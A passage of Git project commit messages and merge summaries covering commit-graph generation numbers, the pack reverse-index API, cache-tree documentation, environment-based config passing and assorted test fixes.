Signed-off-by: Junio C Hamano <gitster@pobox.com>
With most of preparations done, let's implement corrected commit date.
The corrected commit date for a commit is defined as:
* A commit with no parents (a root commit) has corrected commit date
equal to its committer date.
* A commit with at least one parent has corrected commit date equal to
the maximum of its commit date and one more than the largest corrected
commit date among its parents.
As a special case, a root commit with timestamp of zero (01.01.1970
00:00:00Z) has corrected commit date of one, to be able to distinguish
from GENERATION_NUMBER_ZERO (that is, an uncomputed corrected commit
date).
To minimize the space required to store corrected commit date, Git
stores corrected commit date offsets into the commit-graph file. The
corrected commit date offset for a commit is defined as the difference
between its corrected commit date and actual commit date.
Storing corrected commit date requires sizeof(timestamp_t) bytes, which
in most cases is 64 bits (uintmax_t). However, corrected commit date
offsets can be safely stored using only 32-bits. This halves the size
of GDAT chunk, which is a reduction of around 6% in the size of
commit-graph file.
However, using offsets be problematic if a commit is malformed but valid
and has committer date of 0 Unix time, as the offset would be the same
as corrected commit date and thus require 64-bits to be stored properly.
While Git does not write out offsets at this stage, Git stores the
corrected commit dates in member generation of struct commit_graph_data.
It will begin writing commit date offsets with the introduction of
generation data chunk.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a preparatory step for introducing corrected commit dates, let's
return timestamp_t values from commit_graph_generation(), use
timestamp_t for local variables and define GENERATION_NUMBER_INFINITY
as (2 ^ 63 - 1) instead.
We rename GENERATION_NUMBER_MAX to GENERATION_NUMBER_V1_MAX to
represent the largest topological level we can store in the commit data
chunk.
With corrected commit dates implemented, we will have two such *_MAX
variables to denote the largest offset and largest topological level
that can be stored.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a later commit we will introduce corrected commit date as the
generation number v2. Corrected commit dates will be stored in the new
seperate Generation Data chunk. However, to ensure backwards
compatibility with "Old" Git we need to continue to write generation
number v1 (topological levels) to the commit data chunk. Thus, we need
to compute and store both versions of generation numbers to write the
commit-graph file.
Therefore, let's introduce a commit-slab `topo_level_slab` to store
topological levels; corrected commit date will be stored in the member
`generation` of struct commit_graph_data.
The macros `GENERATION_NUMBER_INFINITY` and `GENERATION_NUMBER_ZERO`
mark commits not in the commit-graph file and commits written by a
version of Git that did not compute generation numbers respectively.
Generation numbers are computed identically for both kinds of commits.
A "slab-miss" should return `GENERATION_NUMBER_INFINITY` as the commit
is not in the commit-graph file. However, since the slab is
zero-initialized, it returns 0 (or rather `GENERATION_NUMBER_ZERO`).
Thus, we no longer need to check if the topological level of a commit is
`GENERATION_NUMBER_INFINITY`.
We will add a pointer to the slab in `struct write_commit_graph_context`
and `struct commit_graph` to populate the slab in
`fill_commit_graph_info` if the commit has a pre-computed topological
level as in case of split commit-graphs.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a preparatory step to implement generation number v2, we add tests to
ensure Git can read and parse commit-graph files without Generation Data
chunk. These files represent commit-graph files written by Old Git and
are neccesary for backward compatability.
We extend run_three_modes() and test_three_modes() to *_all_modes() with
the fourth mode being "commit-graph without generation data chunk".
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both fill_commit_graph_info() and fill_commit_in_graph() parse
information present in commit data chunk. Let's simplify the
implementation by calling fill_commit_graph_info() within
fill_commit_in_graph().
fill_commit_graph_info() used to not load committer data from commit data
chunk. However, with the upcoming switch to using corrected committer
date as generation number v2, we will have to load committer date to
compute generation number value anyway.
e51217e15 (t5000: test tar files that overflow ustar headers,
30-06-2016) introduced a test 'generate tar with future mtime' that
creates a commit with committer date of (2^36 + 1) seconds since
EPOCH. The CDAT chunk provides 34-bits for storing committer date, thus
committer time overflows into generation number (within CDAT chunk) and
has undefined behavior.
The test used to pass as fill_commit_graph_info() would not set struct
member `date` of struct commit and load committer date from the object
database, generating a tar file with the expected mtime.
However, with corrected commit date, we will load the committer date
from CDAT chunk (truncated to lower 34-bits to populate the generation
number. Thus, Git sets date and generates tar file with the truncated
mtime.
The ustar format (the header format used by most modern tar programs)
only has room for 11 (or 12, depending on some implementations) octal
digits for the size and mtime of each file.
As the CDAT chunk is overflow by 12-octal digits but not 11-octal
digits, we split the existing tests to test both implementations
separately and add a new explicit test for 11-digit implementation.
To test the 11-octal digit implementation, we create a future commit
with committer date of 2^34 - 1, which overflows 11-octal digits without
overflowing 34-bits of the Commit Date chunks.
To test the 12-octal digit implementation, the smallest committer date
possible is 2^36 + 1, which overflows the CDAT chunk and thus
commit-graph must be disabled for the test.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In indegree_walk_step(), we add unvisited parents to the indegree queue.
However, parents are not guaranteed to be parsed. As the indegree queue
sorts by generation number, let's parse parents before inserting them to
ensure the correct priority order.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before computing Bloom filters, the commit-graph machinery uses
commit_gen_cmp to sort commits by generation order for improved diff
performance. 3d11275505 (commit-graph: examine commits by generation
number, 2020-03-30) claims that this sort can reduce the time spent to
compute Bloom filters by nearly half.
But since c49c82aa4c (commit: move members graph_pos, generation to a
slab, 2020-06-17), this optimization is broken, since asking for a
'commit_graph_generation()' directly returns GENERATION_NUMBER_INFINITY
while writing.
Not all hope is lost, though: 'commit_gen_cmp()' falls back to
comparing commits by their date when they have equal generation number,
and so since c49c82aa4c is purely a date comparison function. This
heuristic is good enough that we don't seem to loose appreciable
performance while computing Bloom filters.
Applying this patch (compared with v2.30.0) speeds up computing Bloom
filters by factors ranging from 0.40% to 5.19% on various repositories [1].
So, avoid the useless 'commit_graph_generation()' while writing by
instead accessing the slab directly. This returns the newly-computed
generation numbers, and allows us to avoid the heuristic by directly
comparing generation numbers.
[1]: https://lore.kernel.org/git/20210105094535.GN8396@szeder.dev/
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous change reduced time spent in strlen() while comparing
consecutive paths in verify_cache(), but we can do better. The
conditional checks the existence of a directory separator at the correct
location, but only after doing a string comparison. Swap the order to be
logically equivalent but perform fewer string comparisons.
To test the effect on performance, I used a repository with over three
million paths in the index. I then ran the following command on repeat:
git -c index.threads=1 commit --amend --allow-empty --no-edit
Here are the measurements over 10 runs after a 5-run warmup:
Benchmark #1: v2.30.0
Time (mean ± σ): 854.5 ms ± 18.2 ms
Range (min … max): 825.0 ms … 892.8 ms
Benchmark #2: Previous change
Time (mean ± σ): 833.2 ms ± 10.3 ms
Range (min … max): 815.8 ms … 849.7 ms
Benchmark #3: This change
Time (mean ± σ): 815.5 ms ± 18.1 ms
Range (min … max): 795.4 ms … 849.5 ms
This change is 2% faster than the previous change and 5% faster than
v2.30.0.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the name length field of cache entries instead of calculating its
value anew.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The end of the cache tree index extension format trails off with
ellipses ever since 23fcc98 (doc: technical details about the index
file format, 2011-03-01). While an intuitive reader could gather what
this means, it could be better to use "and so on" instead.
Really, this is only justified because I also wanted to point out that
the number of subtrees in the index format is used to determine when the
recursive depth-first-search stack should be "popped." This should help
to add clarity to the format.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I had difficulty in my efforts to learn about the cache tree extension
based on the documentation and code because I had an incorrect
assumption about how it behaved. This might be due to some ambiguity in
the documentation, so this change modifies the beginning of the cache
tree format by expanding the description of the feature.
My hope is that this documentation clarifies a few things:
1. There is an in-memory recursive tree structure that is constructed
from the extension data. This structure has a few differences, such
as where the name is stored.
2. What does it mean for an entry to be invalid?
3. When exactly are "new" trees created?
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The index has a "cache tree" extension. This corresponds to a
significant API implemented in cache-tree.[ch]. However, there are a few
places that refer to this erroneously as "cached tree". These are rare,
but notably the index-format.txt file itself makes this error.
The only other reference is in t7104-reset-hard.sh.
Reported-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commands such as "git reset --hard" rebuild the in-memory representation
of the cache tree index extension by parsing tree objects starting at a
known root tree. The performance of this operation can vary widely
depending on the width and depth of the repository's working directory
structure. Measure the time in this operation using trace2 regions in
prime_cache_tree().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we write or read the cache tree index extension, it can be good to
isolate how much of the file I/O time is spent constructing this
in-memory tree from the existing index or writing it out again to the
new index file. Use trace2 regions to indicate that we are spending time
on this operation.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Comments update.
* ab/gettext-charset-comment-fix:
gettext.c: remove/reword a mostly-useless comment
Makefile: remove a warning about old GETTEXT_POISON flag
Fix 2.29 regression where "git mergetool --tool-help" fails to list
all the available tools.
* pb/mergetool-tool-help-fix:
mergetool--lib: fix '--tool-help' to correctly show available tools
"git for-each-repo --config=<var> <cmd>" should not run <cmd> for
any repository when the configuration variable <var> is not defined
even once.
* ds/for-each-repo-noopfix:
for-each-repo: do nothing on empty config
Some tests expect that "ls -l" output has either '-' or 'x' for
group executable bit, but setgid bit can be inherited from parent
directory and make these fields 'S' or 's' instead, causing test
failures.
* mt/t4129-with-setgid-dir:
t4129: don't fail if setgid is set in the test directory
Follow-up on the "maintenance part-3" which introduced scheduled
maintenance tasks to support platforms whose native scheduling
methods are not 'cron'.
* ds/maintenance-part-4:
maintenance: use Windows scheduled tasks
maintenance: use launchctl on macOS
maintenance: include 'cron' details in docs
maintenance: extract platform-specific scheduling
Bash completion (in contrib/) update to make it easier for
end-users to add completion for their custom "git" subcommands.
* fc/completion-aliases-support:
completion: add proper public __git_complete
test: completion: add tests for __git_complete
completion: bash: improve function detection
completion: bash: add __git_have_func helper
"git stash" did not work well in a sparsely checked out working
tree.
* en/stash-apply-sparse-checkout:
stash: fix stash application in sparse-checkouts
stash: remove unnecessary process forking
t7012: add a testcase demonstrating stash apply bugs in sparse checkouts
Retire more names with "sha1" in it.
* ma/sha1-is-a-hash:
hash-lookup: rename from sha1-lookup
sha1-lookup: rename `sha1_pos()` as `hash_pos()`
object-file.c: rename from sha1-file.c
object-name.c: rename from sha1-name.c
Code clean-up.
* ma/t1300-cleanup:
t1300: don't needlessly work with `core.foo` configs
t1300: remove duplicate test for `--file no-such-file`
t1300: remove duplicate test for `--file ../foo`
"git rev-parse" can be explicitly told to give output as absolute
or relative path with the `--path-format=(absolute|relative)` option.
* bc/rev-parse-path-format:
rev-parse: add option for absolute or relative path formatting
abspath: add a function to resolve paths with missing components
The configuration variable 'core.abbrev' can be set to 'no' to
force no abbreviation regardless of the hash algorithm.
* ew/decline-core-abbrev:
core.abbrev=no disables abbreviations
While we currently have the `GIT_CONFIG_PARAMETERS` environment variable
which can be used to pass runtime configuration data to git processes,
it's an internal implementation detail and not supposed to be used by
end users.
Next to being for internal use only, this way of passing config entries
has a major downside: the config keys need to be parsed as they contain
both key and value in a single variable. As such, it is left to the user
to escape any potentially harmful characters in the value, which is
quite hard to do if values are controlled by a third party.
This commit thus adds a new way of adding config entries via the
environment which gets rid of this shortcoming. If the user passes the
`GIT_CONFIG_COUNT=$n` environment variable, Git will parse environment
variable pairs `GIT_CONFIG_KEY_$i` and `GIT_CONFIG_VALUE_$i` for each
`i` in `[0,n)`.
While the same can be achieved with `git -c <name>=<value>`, one may
wish to not do so for potentially sensitive information. E.g. if one
wants to set `http.extraHeader` to contain an authentication token,
doing so via `-c` would trivially leak those credentials via e.g. ps(1),
which typically also shows command arguments.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The `getenv_safe()` helper function helps to safely retrieve multiple
environment values without the need to depend on platform-specific
behaviour for the return value's lifetime. We'll make use of this
function in a following patch, so let's make it available by making it
non-static and adding a declaration.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit added a new format for $GIT_CONFIG_PARAMETERS which
is able to robustly handle subsections with "=" in them. Let's start
writing the new format. Unfortunately, this does much less than you'd
hope, because "git -c" itself has the same ambiguity problem! But it's
still worth doing:
- we've now pushed the problem from the inter-process communication
into the "-c" command-line parser. This would free us up to later
add an unambiguous format there (e.g., separate arguments like "git
--config key value", etc).
- for --config-env, the parser already disallows "=" in the
environment variable name. So:
git --config-env section.with=equals.key=ENVVAR
will robustly set section.with=equals.key to the contents of
$ENVVAR.
The new test shows the improvement for --config-env.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we stuff config options into GIT_CONFIG_PARAMETERS, we shell-quote
each one as a single unit, like:
'section.one=value1' 'section.two=value2'
On the reading side, we de-quote to get the individual strings, and then
parse them by splitting on the first "=" we find. This format is
ambiguous, because an "=" may appear in a subsection. So the config
represented in a file by both:
[section "subsection=with=equals"]
key = value
and:
[section]
subsection = with=equals.key=value
ends up in this flattened format like:
'section.subsection=with=equals.key=value'
and we can't tell which was desired. We have traditionally resolved this
by taking the first "=" we see starting from the left, meaning that we
allowed arbitrary content in the value, but not in the subsection.
Let's make our environment format a bit more robust by separately
quoting the key and value. That turns those examples into:
'section.subsection=with=equals.key'='value'
and:
'section.subsection'='with=equals.key=value'
respectively, and we can tell the difference between them. We can detect
which format is in use for any given element of the list based on the
presence of the unquoted "=". That means we can continue to allow the
old format to work to support any callers which manually used the old
format, and we can even intermingle the two formats. The old format
wasn't documented, and nobody was supposed to be using it. But it's
likely that such callers exist in the wild, so it's nice if we can avoid
breaking them. Likewise, it may be possible to trigger an older version
of "git -c" that runs a script that calls into a newer version of "git
-c"; that new version would see the intermingled format.
This does create one complication, which is that the obvious format in
the new scheme for
[section]
some-bool
is:
'section.some-bool'
with no equals. We'd mistake that for an old-style variable. And it even
has the same meaning in the old style, but:
[section "with=equals"]
some-bool
does not. It would be:
'section.with=equals=some-bool'
which we'd take to mean:
[section]
with = equals=some-bool
in the old, ambiguous style. Likewise, we can't use:
'section.some-bool'=''
because that's ambiguous with an actual empty string. Instead, we'll
again use the shell-quoting to give us a hint, and use:
'section.some-bool'=
to show that we have no value.
Note that this commit just expands the reading side. We'll start writing
the new format via "git -c" in a future patch. In the meantime, the
existing "git -c" tests will make sure we didn't break reading the old
format. But we'll also add some explicit coverage of the two formats to
make sure we continue to handle the old one after we move the writing
side over.
And one final note: since we're now using the shell-quoting as a
semantically meaningful hint, this closes the door to us ever allowing
arbitrary shell quoting, like:
'a'shell'would'be'ok'with'this'.key=value
But we have never supported that (only what sq_quote() would produce),
and we are probably better off keeping things simple, robust, and
backwards-compatible, than trying to make it easier for humans. We'll
continue not to advertise the format of the variable to users, and
instead keep "git -c" as the recommended mechanism for setting config
(even if we are trying to be kind not to break users who may be relying
on the current undocumented format).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the "git blame --porcelain" output, lines that ends with three
integers may not be the line that shows a commit object with line
numbers and block length (the contents from the blamed file or the
summary field can have a line that happens to match). Also, the
names of the author may have more than three SP separated tokens
("git blame -L242,+1 cf6de18aab Documentation/SubmittingPatches"
gives an example). The existing "grep -E | cut" pipeline is a bit
too loose on these two points.
While they can be assumed on the test data, it is not so hard to
use the right pattern from the documented format, so let's do so.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
gitmailmap(5) uses 'GIT_WORK_DIR' to refer to the root of the
repository, but this environment variable does not exist.
Use the correct spelling for that variable, 'GIT_WORK_TREE'.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We run "git pull" against "$cask_repo"; clarify that we are
expecting not to have any of our own modifications and running "git
pull" to merely update, by passing "--ff-only" on the command line.
Also, the "brew cask install" command line triggers an error message
that says:
Error: Calling brew cask install is disabled! Use brew install
[--cask] instead.
In addition, "brew install caskroom/cask/perforce" step triggers an
error that says:
Error: caskroom/cask was moved. Tap homebrew/cask instead.
Attempt to see if blindly following the suggestion in these error
messages gets us into a better shape.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We may return objects in one of two orders: how they appear in the .idx
(sorted by object id) or how they appear in the packfile itself. To
further complicate matters, we have two ordering variables, "i" and
"pos", and it is not clear to which order they apply.
Let's clarify this by using an unambiguous name where possible, and
leaving a comment for the variable that does double-duty.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a pipe, only the return code of the last command is used. Thus, all
other commands will have their return codes masked. Rewrite pipes so
that there are no git commands upstream so that their failure is
reported.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Acked-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The usage comment for test_commit() shows that the --author option
should be given as `--author=<author>`. However, this is incorrect as it
only works when given as `--author <author>`. Correct this erroneous
text.
Also, for the sake of correctness, fix the description as well since we
invoke `git commit` with `--author <author>`, not `--author=<author>`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Acked-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
write_promisor_file() already uses xfopen(), so it would die
if the file cannot be opened for writing. To be consistent
with this behavior and not overlook issues, let's also die if
there are errors when we are actually writing to the file.
Suggested-by: Jeff King <peff@peff.net>
Suggested-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* en/ort-conflict-handling:
merge-ort: add handling for different types of files at same path
merge-ort: copy find_first_merges() implementation from merge-recursive.c
merge-ort: implement format_commit()
merge-ort: copy and adapt merge_submodule() from merge-recursive.c
merge-ort: copy and adapt merge_3way() from merge-recursive.c
merge-ort: flesh out implementation of handle_content_merge()
merge-ort: handle book-keeping around two- and three-way content merge
merge-ort: implement unique_path() helper
merge-ort: handle directory/file conflicts that remain
merge-ort: handle D/F conflict where directory disappears due to merge
* en/diffcore-rename:
diffcore-rename: remove unnecessary duplicate entry checks
diffcore-rename: accelerate rename_dst setup
diffcore-rename: simplify and accelerate register_rename_src()
t4058: explore duplicate tree entry handling in a bit more detail
t4058: add more tests and documentation for duplicate tree entry handling
diffcore-rename: reduce jumpiness in progress counters
diffcore-rename: simplify limit check
diffcore-rename: avoid usage of global in too_many_rename_candidates()
diffcore-rename: rename num_create to num_destinations
To prepare for on-disk reverse indexes, remove a spot in
'offset_to_pack_pos()' that looks at the 'revindex' array in 'struct
packed_git'.
Even though this use of the revindex pointer is within pack-revindex.c,
this clean up is still worth doing. Since the 'revindex' pointer will be
NULL when reading from an on-disk reverse index (instead the
'revindex_data' pointer will be mmaped to the 'pack-*.rev' file), this
call-site would have to include a conditional to lookup the offset for
position 'mi' each iteration through the search.
So instead of open-coding 'pack_pos_to_offset()', call it directly from
within 'offset_to_pack_pos()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that all spots outside of pack-revindex.c that reference 'struct
revindex_entry' directly have been removed, it is safe to hide the
implementation by moving it from pack-revindex.h to pack-revindex.c.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that all 'find_revindex_position()' callers have been removed (and
converted to the more descriptive 'offset_to_pack_pos()'), it is almost
safe to get rid of 'find_revindex_position()' entirely. Almost, except
for the fact that 'offset_to_pack_pos()' calls
'find_revindex_position()'.
Inline 'find_revindex_position()' into 'offset_to_pack_pos()', and
then remove 'find_revindex_position()' entirely.
This is a straightforward refactoring with one minor snag.
'offset_to_pack_pos()' used to load the index before calling
'find_revindex_position()'. That means that by the time
'find_revindex_position()' starts executing, 'p->num_objects' can be
safely read. After inlining, be careful to not read 'p->num_objects'
until _after_ 'load_pack_revindex()' (which loads the index as a
side-effect) has been called.
Another small fix that is included is converting the upper- and
lower-bounds to be unsigned's instead of ints. This dates back to
92e5c77c37 (revindex: export new APIs, 2013-10-24)--ironically, the last
time we introduced new APIs here--but this unifies the types.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that no callers of 'find_pack_revindex()' remain, remove the
function's declaration and implementation entirely.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'estimate_repack_memory()' takes into account the amount of memory
required to load the reverse index in memory by multiplying the assumed
number of objects by the size of the 'revindex_entry' struct.
Prepare for hiding the definition of 'struct revindex_entry' by removing
a 'sizeof()' of that type from outside of pack-revindex.c. Instead,
guess that one off_t and one uint32_t are required per object. Strictly
speaking, this is a worse guess than asking for 'sizeof(struct
revindex_entry)' directly, since the true size of this struct is 16
bytes with padding on the end of the struct in order to align the offset
field.
But, this is an approximation anyway, and it does remove a use of the
'struct revindex_entry' from outside of pack-revindex internals.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid looking at the 'revindex' pointer directly and instead call
'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove direct manipulation of the 'struct revindex_entry' type as well
as calls to the deprecated API in 'packfile.c:unpack_entry()'. Usual
clean-up is performed (replacing '->nr' with calls to
'pack_pos_to_index()' and so on).
Add an additional check to make sure that 'obj_offset()' points at a
valid object. In the case this check is violated, we cannot call
'mark_bad_packed_object()' because we don't know the OID. At the top of
the call stack is do_oid_object_info_extended() (via
packed_object_info()), which does mark the object.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert another call of 'find_pack_revindex()' to its replacement
'pack_pos_to_offset()'. Likewise:
- Avoid manipulating `struct packed_git`'s `revindex` pointer directly
by removing the pointer-as-array indexing.
- Add an additional guard to check that the offset 'obj_offset()'
points to a real object. This should be the case with well-behaved
callers to 'packed_object_info()', but isn't guarenteed.
Other blocks that fill in various other values from the 'struct
object_info' request handle bad inputs by setting the type to
'OBJ_BAD' and jumping to 'out'. Do the same when given a bad offset
here.
The previous code would have segfaulted when given a bad
'obj_offset' value, since 'find_pack_revindex()' would return
'NULL', and then the line that fills 'oi->disk_sizep' would try to
access 'NULL[1]' with a stride of 16 bytes (the width of 'struct
revindex_entry)'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Perform exactly the same conversion as in the previous commit to another
caller within 'packfile.c'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace direct accesses to the 'struct revindex' type with a call to
'pack_pos_to_index()'.
Likewise drop the old-style 'find_pack_revindex()' with its replacement
'offset_to_pack_pos()' (while continuing to perform the same error
checking).
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove another instance of looking at the revindex directly by instead
calling 'pack_pos_to_index()'. Unlike other patches, this caller only
cares about the index position of each object in the loop.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove another instance of direct revindex manipulation by calling
'pack_pos_to_offset()' instead (the caller here does not care about the
index position of the object at position 'pos').
Note that we cannot just use the existing "offset" variable to store the
value we get from pack_pos_to_offset(). It is incremented by
unpack_object_header(), but we later need the original value. Since
we'll no longer have revindex->offset to read it from, we'll store that
in a separate variable ("header" since it points to the entry's header
bytes).
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove another caller that holds onto a 'struct revindex_entry' by
replacing the direct indexing with calls to 'pack_pos_to_offset()' and
'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid storing the revindex entry directly, since this structure will
soon be removed from the public interface. Instead, store the offset and
index position by calling 'pack_pos_to_offset()' and
'pack_pos_to_index()', respectively.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace find_revindex_position() with its counterpart in the new API,
offset_to_pack_pos().
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace direct accesses to the revindex with calls to
'offset_to_pack_pos()' and 'pack_pos_to_index()'.
Since this caller already had some error checking (it can jump to the
'give_up' label if it encounters an error), we can easily check whether
or not the provided offset points to an object in the given pack. This
error checking existed prior to this patch, too, since the caller checks
whether the return value from 'find_pack_revindex()' was NULL or not.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace a direct access to the revindex array with
'pack_pos_to_offset()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace direct revindex accesses with calls to 'pack_pos_to_offset()'
and 'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
First replace 'find_pack_revindex()' with its replacement
'offset_to_pack_pos()'. This prevents any bogus OFS_DELTA that may make
its way through until 'write_reuse_object()' from causing a bad memory
read (if 'revidx' is 'NULL')
Next, replace a direct access of '->nr' with the wrapper function
'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the next several patches, we will prepare for loading a reverse index
either in memory (mapping the inverse of the .idx's contents in-core),
or directly from a yet-to-be-introduced on-disk format. To prepare for
that, we'll introduce an API that avoids the caller explicitly indexing
the revindex pointer in the packed_git structure.
There are four ways to interact with the reverse index. Accordingly,
four functions will be exported from 'pack-revindex.h' by the time that
the existing API is removed. A caller may:
1. Load the pack's reverse index. This involves opening up the index,
generating an array, and then sorting it. Since opening the index
can fail, this function ('load_pack_revindex()') returns an int.
Accordingly, it takes only a single argument: the 'struct
packed_git' the caller wants to build a reverse index for.
This function is well-suited for both the current and new API.
Callers will have to continue to open the reverse index explicitly,
but this function will eventually learn how to detect and load a
reverse index from the on-disk format, if one exists. Otherwise, it
will fallback to generating one in memory from scratch.
2. Convert a pack position into an offset. This operation is now
called `pack_pos_to_offset()`. It takes a pack and a position, and
returns the corresponding off_t.
Any error simply calls BUG(), since the callers are not well-suited
to handle a failure and keep going.
3. Convert a pack position into an index position. Same as above; this
takes a pack and a position, and returns a uint32_t. This operation
is known as `pack_pos_to_index()`. The same thinking about error
conditions applies here as well.
4. Find the pack position for a given offset. This operation is now
known as `offset_to_pack_pos()`. It takes a pack, an offset, and a
pointer to a uint32_t where the position is written, if an object
exists at that offset. Otherwise, -1 is returned to indicate
failure.
Unlike some of the callers that used to access '->offset' and '->nr'
directly, the error checking around this call is somewhat more
robust. This is important since callers should always pass an offset
which points at the boundary of two objects. The API, unlike direct
access, enforces that that is the case.
This will become important in a subsequent patch where a caller
which does not but could check the return value treats the signed
`-1` from `find_revindex_position()` as an index into the 'revindex'
array.
Two design warts are carried over into the new API:
- Asking for the index position of an out-of-bounds object will result
in a BUG() (since no such object exists), but asking for the offset
of the non-existent object at the end of the pack returns the total
size of the pack.
This makes it convenient for callers who always want to take the
difference of two adjacent object's offsets (to compute the on-disk
size) but don't want to worry about boundaries at the end of the
pack.
- offset_to_pack_pos() lazily loads the reverse index, but
pack_pos_to_index() doesn't (callers of the former are well-suited
to handle errors, but callers of the latter are not).
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's replace the 2 different pieces of code that write a
promisor file in 'builtin/repack.c' and 'fetch-pack.c'
with a new function called 'write_promisor_file()' in
'pack-write.c' and 'pack.h'.
This might also help us in the future, if we want to put
back the ref names and associated hashes that were in
the promisor files we are repacking in 'builtin/repack.c'
as suggested by a NEEDSWORK comment just above the code
we are refactoring.
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we are going to refactor the code that actually writes
the promisor file into a separate function in a following
commit, let's rename the current write_promisor_file()
